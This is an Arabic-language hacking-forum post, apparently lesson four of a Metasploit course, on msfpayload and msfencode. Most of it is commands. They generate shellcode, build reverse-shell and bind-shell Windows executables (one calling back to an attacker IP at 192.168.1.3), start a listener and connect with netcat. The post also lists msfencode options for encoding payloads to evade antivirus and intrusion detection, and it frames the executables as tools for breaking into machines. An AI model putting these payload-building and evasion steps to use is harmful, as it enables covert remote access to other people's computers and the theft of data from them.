منتديات شبح البرمجيات يرحب بكم
منتديات شبح البرمجيات يرحب بكم ويرجى التسجيل فى المنتدى لاظهار روابط التحميل
ونحن مختلفون عن الجميع ونسعى للمستحيل
منتديات شبح البرمجيات يرحب بكم
منتديات شبح البرمجيات يرحب بكم ويرجى التسجيل فى المنتدى لاظهار روابط التحميل
ونحن مختلفون عن الجميع ونسعى للمستحيل
منتديات شبح البرمجيات يرحب بكم
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


منتديات شبح البرمجيات دائم في التفوق
 
الرئيسيةالرئيسية  أحدث الصورأحدث الصور  التسجيلالتسجيل  دخولدخول  

 

  الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ]

اذهب الى الأسفل 
كاتب الموضوعرسالة
Boss
Admin
Boss


عدد المساهمات : 50
تاريخ التسجيل : 24/07/2013

 الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ] Empty
مُساهمةموضوع: الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ]    الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ] Emptyالأحد أغسطس 04, 2013 2:08 pm

 السلام عليكم ورحمه الله وبركاته

اليوم درسنآ يكمل الدرس السابق .

1- msfpayload

msfencode -2


msfpayload : اداه مهمه لعمل الـ shellcode

الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه

سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA

طريقه عمله .
[/b][/b][/b][/b]
كود PHP:
الرمز:

./msfpayload payload var=val 




payload = اسم البايلود

var =المتغيرات مثلا lport ويعني البورت الخاص بالمهاجم

كيف نعرف متغيرات الـ payload ؟

نعرفها عن طريق الامر

كود PHP:
الرمز:

 ./msfpayload windows/shell/reverse_tcp  O 




الصوره تتكلم .
 الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ] YlC63057


local port= lport
البورت الخاص بالمهاجم ,
local host = lhost
ip الخاص بالمهاجم

خذها قاعده بدون تفكير دائما اي البايلود يستخدم اتصال عكسي reverse يحتاج lhost,lport

bind_shell
الحصول على شل بأتصال مباشر

reverse_shell
الحصول على شل بأتصال عكسي

الان نعمل تطبيق .

كود PHP:
الرمز:

 ./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C 




[/QUOTE]

 الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ] UIA62219

الان راح نعمل ملفات exe للاختراق بأستخدام msfpayload ,

البعض يتسائل يقول لماذا استخدم msfpayload لعمل ملفات exe وانا عندي shell access

صحيح عندك شل لكن الشل هذا حصلته عن طريق ثغره خارج الميتاسبلويت , الثغره تطلب مساحه معينه من الـ shellcode صغيره بحيث ما تقبل meterpreter , vncinject

طبعا الان ما فيه الا حل واحد وهو تحميل meterpreter , بكل تأكيد راح يكون exe

كيف نعمله على صيغه exe , بأستخدام mfspayload .

مثال لعمل exe

كود PHP:
الرمز:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe 





طريقه التنصت للاتصال

./

كود PHP:
الرمز:

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E 




msfcli راح اشرحها بدرس القادم .


مثال اخر

كود PHP:
الرمز:

./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe 




الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

~~~~~~~~~~~~~~~~

msfencode : اداه تستخدم لتشفير shellcode لتخطي IDS او AV

كود PHP:
الرمز:

Usage: ./msfencode <options>



OPTIONS:



    -a <opt>  The architecture to encode as

    -b <opt>  The list of characters to avoid: '\x00\xff'

    -c <opt>  The number of times to encode the data

    -e <opt>  The encoder to use

    -h        Help banner

    -i <opt>  Encode the contents of the supplied file path

    -l        List available encoders

    -m <opt>  Specifies an additional module search path

    -n        Dump encoder information

    -o <opt>  The output file

    -p <opt>  The platform to encode for

    -s <opt>  The maximum size of the encoded data

    -t <opt>  The format to display the encoded buffer 

    -x <opt>  Specify an alternate win32 executable template 





الاداه واضحه جدا لكن راح تنشرح , والشرح راح يكون فديو

قبل مده انا وجدت فديو جميل جدا ويتكلم عن هذه الاداه وكيفيه تخطي

مضاد الفيروسات لمده 24 دقيقه والشرح على الوندوز .  الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ] Biggrin

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


الان بقى الواجهات
1-msfconsole
msfcli -2
msfgui -3
msfwe b -4

وراح يتم التطرق لها بالدرس القادم .



قبل ما انتهي , راح اعمل اختبار سريع لـ أتأكد انك متابع الدروس معاي وفاهم جميع الدروس !

لماذا لم استخدم msfcli في هذا المثال , مع اني استطيع استخدامه ؟

كود PHP:
الرمز:

./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe 




الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

ولماذا > متعوب عليها  الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ] Biggrin

استخدمت الاداه msfcli ,واستخدامها الزامي بمعنى اخر ما تتخلى عنها الا اذا عملت نفس الشيء msfconsole وجميعا مثل بعض !

كود PHP:
الرمز:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe 





طريقه التنصت للاتصال

./

كود PHP:
الرمز:

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E 





الجواب راح تلقونه بالدروس السابقه اذا كنت متابع  الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ] Biggrin

hint: الجواب 5 كلمات  الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ] Biggrin
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
الدرس الرابع : استخدام msfencode , msfpayload ‏[ دورة الميتاسبلويت ]
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  الدرس الثامن : الدخول لعالم الميتاسبلويت ! [ دورة الميتاسبلويت ]
» الدرس الخامس : التعامل مع الميتاسبلويت[ دورة الميتاسبلويت ]
»  الدرس الثالث: ادوات الميتاسبلويت[ دورة الميتاسبلويت ]
»  الدرس الثاني: شرح الميتاسبلويت وملفاته [ دورة الميتاسبلويت ]
»  الدرس الاول : مقدمه وتوضيحات [ دورة الميتاسبلويت ]

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات شبح البرمجيات يرحب بكم :: القسم الخاص بتطوير المنتديات وحمايتها لمساعدة باقي المنتديات+الاخترقات المختلفه :: دورات منتندي شبح البرمجيات في كافة المجالات المختلفه-
انتقل الى: